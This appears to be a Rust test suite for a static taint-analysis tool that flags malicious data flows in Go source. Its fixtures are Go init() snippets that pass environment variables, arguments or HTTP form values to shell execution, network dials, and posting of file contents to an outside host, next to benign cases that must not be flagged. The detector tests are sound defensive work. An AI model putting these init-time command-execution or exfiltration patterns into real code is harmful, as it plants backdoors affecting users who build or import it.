#![cfg(feature = "go")]
use pyrograph::analyze;
fn findings_count(source: &str) -> usize {
let graph = pyrograph::parse::parse_go(source, "init.go").expect("parse Go source");
analyze(&graph).expect("analyze graph").len()
}
#[test]
fn tp_init_env_getenv_to_exec_command_run() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
cmd := os.Getenv("PAYLOAD")
exec.Command(cmd).Run()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_env_getenv_to_exec_command_output() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
arg := os.Getenv("PAYLOAD")
exec.Command("/bin/sh", "-c", arg).Output()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_env_getenv_to_exec_command_combined_output() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
arg := os.Getenv("PAYLOAD")
exec.Command("/bin/bash", "-lc", arg).CombinedOutput()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_command_var_run() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
cmd := exec.Command("/bin/sh", "-c", os.Getenv("PAYLOAD"))
cmd.Run()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_env_getenv_to_os_start_process() {
let source = r#"
package main
import "os"
func init() {
name := os.Getenv("PAYLOAD")
os.StartProcess(name, nil)
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_environ_to_net_dial() {
let source = r#"
package main
import "os"
import "net"
func init() {
env := os.Environ()
net.Dial("tcp", env[0])
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_argv_to_http_get() {
let source = r#"
package main
import "os"
import "net/http"
func init() {
target := os.Args[1]
http.Get("https://example.com/?q=" + target)
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_flag_args_to_http_post() {
let source = r#"
package main
import "flag"
import "net/http"
import "strings"
func init() {
args := flag.Args()
http.Post("https://example.com/upload", "text/plain", strings.NewReader(args[0]))
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_ioutil_readfile_to_os_create() {
let source = r#"
package main
import "io/ioutil"
import "os"
func init() {
data := ioutil.ReadFile("/tmp/payload")
os.Create(data)
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_os_readfile_to_os_writefile() {
let source = r#"
package main
import "os"
func init() {
data := os.ReadFile("/tmp/payload")
os.WriteFile("/tmp/out", data, 0644)
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_http_request_formvalue_to_exec_command_output() {
let source = r#"
package main
import "net/http"
import "os/exec"
func init() {
req := &http.Request{}
payload := req.FormValue("cmd")
exec.Command("sh", "-c", payload).Output()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_http_request_query_to_start_process() {
let source = r#"
package main
import "net/http"
import "os"
func init() {
req := &http.Request{}
params := req.URL.Query()
os.StartProcess(params.Get("cmd"), nil)
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_http_post_from_read_file() {
let source = r#"
package main
import "os"
import "net/http"
import "bytes"
func init() {
body := os.ReadFile("/tmp/data")
http.Post("https://example.com", "text/plain", bytes.NewBuffer(body))
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_conn_source_to_file_sink() {
let source = r#"
package main
import "net"
import "os"
func init() {
var conn net.Conn
os.Create(conn.String())
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_reflect_call() {
let source = r#"
package main
import "os"
import "reflect"
func init() {
v := reflect.ValueOf(os.Getenv("PAYLOAD"))
v.Call(nil)
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_init_net_dial_chain_in_init() {
let source = r#"
package main
import "flag"
import "net"
func init() {
t := flag.Args()
net.Dial("tcp", t[0])
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn fp_init_constant_http_get() {
let source = r#"
package main
import "net/http"
func init() {
_ = http.Get("https://example.com/health")
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_constant_exec_run() {
let source = r#"
package main
import "os/exec"
func init() {
_ = exec.Command("/bin/echo", "ok").Run()
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_env_log_only() {
let source = r#"
package main
import "os"
func init() {
v := os.Getenv("SAFE_TOKEN")
if v != "" {
_ = v
}
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_sanitized_env_getenv_with_parseint() {
let source = r#"
package main
import "os"
import "strconv"
import "net/http"
func init() {
v := os.Getenv("PORT")
p, _ := strconv.Atoi(v)
http.Get("https://example.com/health")
}
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_os_args_no_sink() {
let source = r#"
package main
import "os"
func init() {
v := os.Args
if len(v) > 1 {
_ = v[0]
}
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_environ_used_for_local_math_only() {
let source = r#"
package main
import "os"
func init() {
env := os.Environ()
x := len(env)
_ = x
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_conn_source_no_sink() {
let source = r#"
package main
import "net"
func init() {
var conn net.Conn
_ = conn
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_reflect_call_without_source() {
let source = r#"
package main
import "reflect"
func init() {
f := reflect.ValueOf(10)
f.Call(nil)
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_readfile_with_no_sink() {
let source = r#"
package main
import "io/ioutil"
func init() {
_ = ioutil.ReadFile("/etc/config")
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_escaped_http_request_formvalue() {
let source = r#"
package main
import "net/http"
import "html"
func init() {
req := &http.Request{}
v := req.FormValue("q")
_ = html.EscapeString(v)
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_flag_args_not_exfiltrated() {
let source = r#"
package main
import "flag"
func init() {
args := flag.Args()
if len(args) == 0 {
return
}
_ = args[0]
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn fp_init_os_create_from_constant_path() {
let source = r#"
package main
import "os"
func init() {
_ = os.Create("/tmp/constant.log")
}
"#;
assert_eq!(findings_count(source), 0);
}
#[test]
fn tp_method_receiver_net_conn_to_file_sink() {
let source = r#"
package main
import "net"
import "os"
func init() {}
func (conn net.Conn) Exfil() {
os.Create(conn.String())
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_multiple_init_functions_both_tracked() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
a := os.Getenv("A")
exec.Command(a).Run()
}
func init() {
b := os.Getenv("B")
exec.Command(b).Run()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_goroutine_exec_command() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
cmd := os.Getenv("PAYLOAD")
go exec.Command(cmd).Run()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_defer_exec_command() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
cmd := os.Getenv("PAYLOAD")
defer exec.Command(cmd).Run()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_channel_send_receive_to_exec() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
ch := make(chan string)
cmd := os.Getenv("PAYLOAD")
ch <- cmd
out := <-ch
exec.Command(out).Run()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_range_channel_to_exec() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
ch := make(chan string)
ch <- os.Getenv("PAYLOAD")
for cmd := range ch {
exec.Command(cmd).Run()
}
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_range_slice_to_exec() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
for _, arg := range os.Args {
exec.Command(arg).Run()
}
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_type_assertion_to_exec() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
var data interface{} = os.Getenv("PAYLOAD")
cmd := data.(string)
exec.Command(cmd).Run()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_type_switch_alias_to_exec() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
var data interface{} = os.Getenv("PAYLOAD")
switch cmd := data.(type) {
case string:
exec.Command(cmd).Run()
}
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_select_receive_to_exec() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
ch := make(chan string)
ch <- os.Getenv("PAYLOAD")
select {
case cmd := <-ch:
exec.Command(cmd).Run()
}
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_func_literal_exec_command() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
payload := os.Getenv("PAYLOAD")
f := func() {
exec.Command(payload).Run()
}
f()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_slice_expression_to_exec() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
args := os.Args
part := args[1:]
exec.Command(part[0]).Run()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_go_func_literal_exec_command() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
payload := os.Getenv("PAYLOAD")
go func() {
exec.Command(payload).Run()
}()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn tp_defer_func_literal_exec_command() {
let source = r#"
package main
import "os"
import "os/exec"
func init() {
payload := os.Getenv("PAYLOAD")
defer func() {
exec.Command(payload).Run()
}()
}
"#;
assert!(findings_count(source) > 0);
}
#[test]
fn struct_embedding_creates_node() {
let source = r#"
package main
type Inner struct { data string }
type Outer struct { Inner }
func init() {}
"#;
let graph = pyrograph::parse::parse_go(source, "main.go").expect("parse Go source");
assert!(graph.nodes().iter().any(|n| n.name == "Inner"));
}